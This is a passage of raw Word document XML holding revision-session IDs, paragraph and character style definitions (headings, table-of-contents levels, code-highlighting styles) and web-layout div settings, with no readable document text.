    <w:rsid w:val="00F21EC0"/>
    <w:rsid w:val="00F22C1F"/>
    <w:rsid w:val="00F22E41"/>
    <w:rsid w:val="00F2317B"/>
    <w:rsid w:val="00F2334F"/>
    <w:rsid w:val="00F23618"/>
    <w:rsid w:val="00F2361E"/>
    <w:rsid w:val="00F23674"/>
    <w:rsid w:val="00F23F73"/>
    <w:rsid w:val="00F2494F"/>
    <w:rsid w:val="00F25965"/>
    <w:rsid w:val="00F268F4"/>
    <w:rsid w:val="00F26C9C"/>
    <w:rsid w:val="00F27077"/>
    <w:rsid w:val="00F27543"/>
    <w:rsid w:val="00F27CBE"/>
    <w:rsid w:val="00F27D50"/>
    <w:rsid w:val="00F30BB4"/>
    <w:rsid w:val="00F3137C"/>
    <w:rsid w:val="00F33483"/>
    <w:rsid w:val="00F33AFC"/>
    <w:rsid w:val="00F344AE"/>
    <w:rsid w:val="00F34A2C"/>
    <w:rsid w:val="00F34E74"/>
    <w:rsid w:val="00F35A2B"/>
    <w:rsid w:val="00F35E21"/>
    <w:rsid w:val="00F36253"/>
    <w:rsid w:val="00F363B4"/>
    <w:rsid w:val="00F36A0D"/>
    <w:rsid w:val="00F370D9"/>
    <w:rsid w:val="00F40224"/>
    <w:rsid w:val="00F40C68"/>
    <w:rsid w:val="00F41FA3"/>
    <w:rsid w:val="00F422B4"/>
    <w:rsid w:val="00F42CDC"/>
    <w:rsid w:val="00F42CEF"/>
    <w:rsid w:val="00F42F92"/>
    <w:rsid w:val="00F43C80"/>
    <w:rsid w:val="00F43E61"/>
    <w:rsid w:val="00F4512C"/>
    <w:rsid w:val="00F45251"/>
    <w:rsid w:val="00F4605E"/>
    <w:rsid w:val="00F478D1"/>
    <w:rsid w:val="00F47911"/>
    <w:rsid w:val="00F47ACE"/>
    <w:rsid w:val="00F50C69"/>
    <w:rsid w:val="00F51127"/>
    <w:rsid w:val="00F511B2"/>
    <w:rsid w:val="00F51BFB"/>
    <w:rsid w:val="00F51D43"/>
    <w:rsid w:val="00F52412"/>
    <w:rsid w:val="00F5251C"/>
    <w:rsid w:val="00F52618"/>
    <w:rsid w:val="00F52D36"/>
    <w:rsid w:val="00F537F6"/>
    <w:rsid w:val="00F54445"/>
    <w:rsid w:val="00F54C1D"/>
    <w:rsid w:val="00F54E48"/>
    <w:rsid w:val="00F550BA"/>
    <w:rsid w:val="00F55E74"/>
    <w:rsid w:val="00F600CF"/>
    <w:rsid w:val="00F60265"/>
    <w:rsid w:val="00F609ED"/>
    <w:rsid w:val="00F60C1B"/>
    <w:rsid w:val="00F618CF"/>
    <w:rsid w:val="00F61F98"/>
    <w:rsid w:val="00F6246C"/>
    <w:rsid w:val="00F624DB"/>
    <w:rsid w:val="00F64A75"/>
    <w:rsid w:val="00F64AB0"/>
    <w:rsid w:val="00F64C07"/>
    <w:rsid w:val="00F65D6E"/>
    <w:rsid w:val="00F66346"/>
    <w:rsid w:val="00F668AD"/>
    <w:rsid w:val="00F6758B"/>
    <w:rsid w:val="00F678BB"/>
    <w:rsid w:val="00F70381"/>
    <w:rsid w:val="00F70807"/>
    <w:rsid w:val="00F709F7"/>
    <w:rsid w:val="00F7253D"/>
    <w:rsid w:val="00F72DB4"/>
    <w:rsid w:val="00F7342F"/>
    <w:rsid w:val="00F7474B"/>
    <w:rsid w:val="00F75930"/>
    <w:rsid w:val="00F76381"/>
    <w:rsid w:val="00F764B3"/>
    <w:rsid w:val="00F76E3A"/>
    <w:rsid w:val="00F80B96"/>
    <w:rsid w:val="00F81171"/>
    <w:rsid w:val="00F81212"/>
    <w:rsid w:val="00F815A9"/>
    <w:rsid w:val="00F81E39"/>
    <w:rsid w:val="00F83071"/>
    <w:rsid w:val="00F840EA"/>
    <w:rsid w:val="00F84289"/>
    <w:rsid w:val="00F851C0"/>
    <w:rsid w:val="00F86341"/>
    <w:rsid w:val="00F86930"/>
    <w:rsid w:val="00F90BBD"/>
    <w:rsid w:val="00F90DFB"/>
    <w:rsid w:val="00F9109D"/>
    <w:rsid w:val="00F921C0"/>
    <w:rsid w:val="00F93004"/>
    <w:rsid w:val="00F94033"/>
    <w:rsid w:val="00F945F2"/>
    <w:rsid w:val="00F94A76"/>
    <w:rsid w:val="00F954C6"/>
    <w:rsid w:val="00F95A43"/>
    <w:rsid w:val="00F95AEE"/>
    <w:rsid w:val="00F95B72"/>
    <w:rsid w:val="00F96023"/>
    <w:rsid w:val="00F961E9"/>
    <w:rsid w:val="00F97833"/>
    <w:rsid w:val="00F97B2F"/>
    <w:rsid w:val="00FA02BF"/>
    <w:rsid w:val="00FA031B"/>
    <w:rsid w:val="00FA16CD"/>
    <w:rsid w:val="00FA1AB4"/>
    <w:rsid w:val="00FA1B35"/>
    <w:rsid w:val="00FA1F6C"/>
    <w:rsid w:val="00FA1FFD"/>
    <w:rsid w:val="00FA34C2"/>
    <w:rsid w:val="00FA3834"/>
    <w:rsid w:val="00FA5412"/>
    <w:rsid w:val="00FA5823"/>
    <w:rsid w:val="00FA6169"/>
    <w:rsid w:val="00FA65E9"/>
    <w:rsid w:val="00FA6B51"/>
    <w:rsid w:val="00FA78E0"/>
    <w:rsid w:val="00FB0006"/>
    <w:rsid w:val="00FB0F5F"/>
    <w:rsid w:val="00FB0F91"/>
    <w:rsid w:val="00FB16E6"/>
    <w:rsid w:val="00FB1CF5"/>
    <w:rsid w:val="00FB1EA9"/>
    <w:rsid w:val="00FB20A3"/>
    <w:rsid w:val="00FB246C"/>
    <w:rsid w:val="00FB26D4"/>
    <w:rsid w:val="00FB476A"/>
    <w:rsid w:val="00FB487C"/>
    <w:rsid w:val="00FB4CF5"/>
    <w:rsid w:val="00FB5276"/>
    <w:rsid w:val="00FB59DE"/>
    <w:rsid w:val="00FB6631"/>
    <w:rsid w:val="00FC21A7"/>
    <w:rsid w:val="00FC23F5"/>
    <w:rsid w:val="00FC276F"/>
    <w:rsid w:val="00FC3D6A"/>
    <w:rsid w:val="00FC4D88"/>
    <w:rsid w:val="00FC4E71"/>
    <w:rsid w:val="00FC58F7"/>
    <w:rsid w:val="00FC5A6D"/>
    <w:rsid w:val="00FC5F33"/>
    <w:rsid w:val="00FC6DCB"/>
    <w:rsid w:val="00FC73C1"/>
    <w:rsid w:val="00FC7640"/>
    <w:rsid w:val="00FC7B07"/>
    <w:rsid w:val="00FC7EFA"/>
    <w:rsid w:val="00FD05FC"/>
    <w:rsid w:val="00FD07B0"/>
    <w:rsid w:val="00FD0CFC"/>
    <w:rsid w:val="00FD1306"/>
    <w:rsid w:val="00FD2381"/>
    <w:rsid w:val="00FD24CC"/>
    <w:rsid w:val="00FD25AB"/>
    <w:rsid w:val="00FD3000"/>
    <w:rsid w:val="00FD3C4B"/>
    <w:rsid w:val="00FD4044"/>
    <w:rsid w:val="00FD5670"/>
    <w:rsid w:val="00FD5823"/>
    <w:rsid w:val="00FD7431"/>
    <w:rsid w:val="00FD7658"/>
    <w:rsid w:val="00FE06FC"/>
    <w:rsid w:val="00FE0C0A"/>
    <w:rsid w:val="00FE1804"/>
    <w:rsid w:val="00FE1BB1"/>
    <w:rsid w:val="00FE26A1"/>
    <w:rsid w:val="00FE3834"/>
    <w:rsid w:val="00FE4147"/>
    <w:rsid w:val="00FE467B"/>
    <w:rsid w:val="00FE5000"/>
    <w:rsid w:val="00FE65DF"/>
    <w:rsid w:val="00FE6C18"/>
    <w:rsid w:val="00FE72FC"/>
    <w:rsid w:val="00FE77EA"/>
    <w:rsid w:val="00FE789E"/>
    <w:rsid w:val="00FE7BAA"/>
    <w:rsid w:val="00FE7F8E"/>
    <w:rsid w:val="00FF0677"/>
    <w:rsid w:val="00FF0BAF"/>
    <w:rsid w:val="00FF1009"/>
    <w:rsid w:val="00FF12B2"/>
    <w:rsid w:val="00FF1E10"/>
    <w:rsid w:val="00FF20B2"/>
    <w:rsid w:val="00FF20F6"/>
    <w:rsid w:val="00FF2F6F"/>
    <w:rsid w:val="00FF50C0"/>
    <w:rsid w:val="00FF5640"/>
    <w:rsid w:val="00FF5A4B"/>
    <w:rsid w:val="00FF6549"/>
    <w:rsid w:val="00FF6668"/>
    <w:rsid w:val="00FF6B93"/>
    <w:rsid w:val="00FF6D3C"/>
    <w:rsid w:val="00FF7345"/>
    <w:rsid w:val="00FF7D2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9F1DA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80609C03-2AAE-42FE-A947-C141EEBED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3E9"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005349F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349F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349F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5349F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349F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349F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49F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49F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49F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49F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349F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349F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5349F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349F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349F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49F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49F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49FC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005349F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49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49F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49F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49FC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="005349FC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005349FC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005349FC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005349F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349FC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005349FC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006C086A"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C0B8D"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C0B8D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A26A22"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DE5D88"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00D033BC"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EA44B5"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86114"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B3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32BAB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B32BAB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B32BAB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B2F6C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B2F6C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008944F0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008944F0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008944F0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B4136F"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00F2317B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Mangal"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-I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9857">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="5638306">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1887133225">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="5904625">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="5984611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="10422805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="972446983">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="10882363">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1438326963">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="11957720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
